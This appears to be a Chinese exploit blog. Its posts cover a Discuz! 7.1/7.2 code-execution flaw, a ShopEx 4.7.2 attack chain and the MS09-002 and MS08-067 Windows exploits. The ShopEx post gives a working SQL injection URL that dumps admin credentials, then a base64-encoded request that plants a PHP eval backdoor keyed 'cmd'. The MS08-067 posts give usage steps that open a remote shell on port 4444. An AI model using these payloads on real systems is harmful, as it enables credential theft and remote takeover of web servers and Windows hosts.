MK2-风之谷 - Exploit

Discuz! 7.1 & 7.2 远程代码执行漏洞

mk2leo@qq.com (leoling504) — Thu, 21 Jan 2010 20:32:32 +0800

SEBUG-Appdir:Discuz!

發佈時間:2010-01-06

影響版本:

Discuz! 7.1 & 7.2

漏洞描述:

产生漏洞的$scriptlang数组在安装插件后已经初始化Discuz！新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化，可以任意提交，从而可以执行任意PHP命令。下面来分析下这个远程代码执行漏洞，这个问题真的很严重，可以直接写shell的：一、漏洞来自showmessage函数：function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {     extract($GLOBALS, EXTR_SKIP);//危险的用法，未初始化的变量可以直接带进函数，直接导致了问题产生，from www.oldjun.com     global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;     define('CACHE_FORBIDDEN', TRUE);     $hookscriptmessage = $show_message = $message;$messagehandle = 0;     $msgforward = unserialize($_DCACHE['settings']['msgforward']);     $refreshtime = intval($msgforward['refreshtime']);     $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);     $msgforward['refreshtime'] = $refreshtime * 1000;     $url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);     $seccodecheck = $seccodestatus & 2;     if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {         $statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';         if($fp = @fopen($statlogfile, 'a')) {             @flock($fp, 2);             if(is_array($funcstatinfo)) {                 $funcstatinfo = array_unique($funcstatinfo);                 foreach($funcstatinfo as $funcinfo) {                     fwrite($fp, funcstat_query($funcinfo, $message)."\n");                 }             } else {                 fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");             }             fclose($fp);             $funcstatinfo = $GLOBALS['funcstatinfo'] = '';         }     }     if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {         write_statlog($message);     }     if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {         updatesession();         dheader("location: ".str_replace('&', '&', $url_forward));     }     if(!empty($infloat)) {         if($extra) {             $messagehandle = $extra;         }         $extra = '';     }     if(in_array($extra, array('HALTED', 'NOPERM'))) {         $discuz_action = 254;     } else {         $discuz_action = 255;     }     include language('messages');     $vars = explode(':', $message);//只要含:就可以了     if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可，用:分割         eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化，可以自定义，from www.oldjun.com     } elseif(isset($language[$message])) {         $pre = $inajax ? 'ajax_' : '';         eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");         unset($pre);     }     ......} 二、DZ的全局机制导致了未初始化的参数可以任意提交：foreach(array('_COOKIE', '_POST', '_GET') as $_request) {     foreach($$_request as $_key => $_value) {         $_key{0} != '_' && $$_key = daddslashes($_value);     }} 三、misc.php正好有个可以自定义message的点，其实也是未初始化：elseif($action == 'imme_binding' && $discuz_uid) {     if(isemail($id)) {         $msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");         $msn = explode("\t", $msn);         $id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));         $msn = "$msn[0]\t$id";         $db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");         showmessage('msn_binding_succeed', 'memcp.php');     } else {         if($result == 'Declined') {             dheader("Location: memcp.php");         } else {             showmessage($response['result']);//$response没有初始化，可以自定义，from www.oldjun.com         }     }    }

<*參考

T00ls.net

測試方法:

[www.sebug.net]
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!

showmessage函数里$vars = explode(':', $message);然后message可以自己控制，于是就很容易了，参数是两个自定义的数组。下面是HTML测试代码：帖子ID，指定一个存在的帖子即可：
forumdata/cache/usergroup_01.php cmd 生成的一句话

SEBUG安全建議:

更新内容:修复版本存在的重要安全问题修复版本中存在的其他使用 bug安全级别：     高涉及版本：Discuz! 7.1 , Discuz! 7.2修补方法:1. 根据您的版本下载补丁包7.1 用户 http://download2.comsenz.com/Discuz/patch/7.1/D710_UPGRADE_TO_20100110.zip7.2 用户 http://download2.comsenz.com/Discuz/patch/7.2/D720_UPGRADE_TO_20100110.zip2. 解压缩文件3. 上传upload目录中的所有文件到您的论坛, 覆盖原有程序4. 修复完成注意事项:下目录中包含有相应版本的以往的补丁文件, 如果您尚未修复, 您应当按照补丁发布的时间, 依次覆盖修复http://download2.comsenz.com/Discuz/patch/7.1/http://download2.comsenz.com/Discuz/patch/7.2/

// sebug.net [2010-01-07]

ShopEx 4.7.2 0day

mk2leo@qq.com (leoling504) — Wed, 04 Mar 2009 21:04:03 +0800

作者：无名

我是无名，这次写一个shopex4.7.2漏洞，

已经通知了官方，今天就发出来，

首先syssite/shopadmin/order_service.php后台这个文件没有验证用户身份，

重要的是$v_id参数没有过滤

syssite/shopadmin/order_service.php?m_id=1&key=986078fbe1474d61464d08535f1002a8&&v_id=1+and+1=2+union+select+concat(username,0x20,userpass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+sdb_mall_offer_operater%23

直接获取管理员账号密码md5自己解，字段数不对用order by 猜，

有的站只能显示出来前14位，就用left(password,14) mid(password,15,4) right(password,14) 合起来就是完整的32位密码了

如果表名改了,mysql 5.0以上版本自己爆，相关内容不再叙述

登陆后台，接下来讲shell获取部分，(普通管理员一样利用)

分析根目录下htmlcache.php

分析代码的朋友注意了，

$url = base64_decode( $_GET['url'] );$filename = base64_decode( $_GET['filename'] );$signcode = $_GET['signcode'];$verifycode = md5( $url.$filename."1e236443e5a30b09910e0d48c994b8e6" );if ( $_cvar['seoCacheTime'] == "0" ){exit( );}

变量 url filename 提交的时候用base64 加密，

下面几句

if ( $_cvar['seoCacheTime'] == "0" ){exit( );}if ( substr( $filename, 0, 3 ) == "../" ){exit( );}if ( $verifycode != $signcode ){exit( );}

$filename 不能有 ../

$verifycode 要等于$signcode

$_cvar['seoCacheTime'] 在syssite\home\shop\1\shop.cache.php有定义，默认是0

前面几个很容易就绕过去了，$_cvar['seoCacheTime'] 我在后台里一直没有找到在哪里设置，

分析代码发现，进入后台，直接在url后面输入syssite/shopadmin/admin_seo_act.php?act=savecachetime&seocachetime=60

设置seocachetime为60

好了，条件满足，开始获取shell

base64分别加密
http://你的url/test.txt 为$url变量，()
123.php 为$filename变量
$signcode是url+filename+1e236443e5a30b09910e0d48c994b8e6 的32位md5值

其实url完全不用获取test.txt内容的，有时候会获取不成功，
url直接写成http://www.baidu.com/ base64加密就行了

加密结果

url   aHR0cDovL3d3dy5iYWlkdS5jb20vPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=filename MTIzLnBocA==signcode 186350a50934cb17b9bc47f5e067adbe

最后提交

htmlcache.php?url=aHR0cDovL3d3dy5iYWlkdS5jb20vPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=&filename=MTIzLnBocA==&signcode=186350a50934cb17b9bc47f5e067adbe

直接在根目录生成123.php内容为一句话后门，密码cmd

喜欢分析代码的朋友如果有什么不明白的地方，或者有什么错误的地方，欢迎指正

联系团队
SD_无名 QQ 57112848
SD_′&廢. QQ 5081558

这里只是技术讨论，任何利用本文章做破坏的，本人概不负责

最后附上一个半成品的利用工具

下载地址：shopex472_exp.rar

IE 7 MS09002 漏洞代码

mk2leo@qq.com (leoling504) — Mon, 23 Feb 2009 01:15:04 +0800

这个是打开计算机的SHELLCODE ...基本上和各大GOOGLE找到的一样.会有卡和死IE的现像..大家帮一下不卡版吧...

MS08-067 EXP出来了(= ='' 测试成功)

mk2leo@qq.com (leoling504) — Mon, 27 Oct 2008 00:36:14 +0800

这个可说是另一个超强的洞了.基本上.只要知道对方的IP.就能取得SHELL了(说明是这样.太强了吧).而且配合近来MS的黑屏活动.应该都没什么人会更新MS补丁的了..

代码码就不贴出来了.反正贴了也没多少人会懂(包括我)..

附件中已有源码.和EXP程序..

使用方法....

c:\ms08067.exe 192.168.10.10

连接成功后会显示 SEND PAYLOAD OVER! 恭喜.

用TELNET 连接4444端口吧..SHELL出来了....

看大家RP吧..可能会成功取得SHELL的.....

MS08-067.rar

MS Windows Server Service Code Execution PoC (MS08-067)

mk2leo@qq.com (leoling504) — Fri, 24 Oct 2008 03:31:34 +0800

In vstudio command prompt:

mk.bat

attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)

net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc

In some cases, /user:"" "", will suffice (i.e., anonymous connection)

You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc. However, in some cases, you will get
nothing.

This is because it depends on the state of the stack prior to the "overflow".
You need a slash on the stack prior to the input buffer.

So play around a bit, you'll get it working reliably...

poc:
http://milw0rm.com/sploits/2008-ms08-067.zip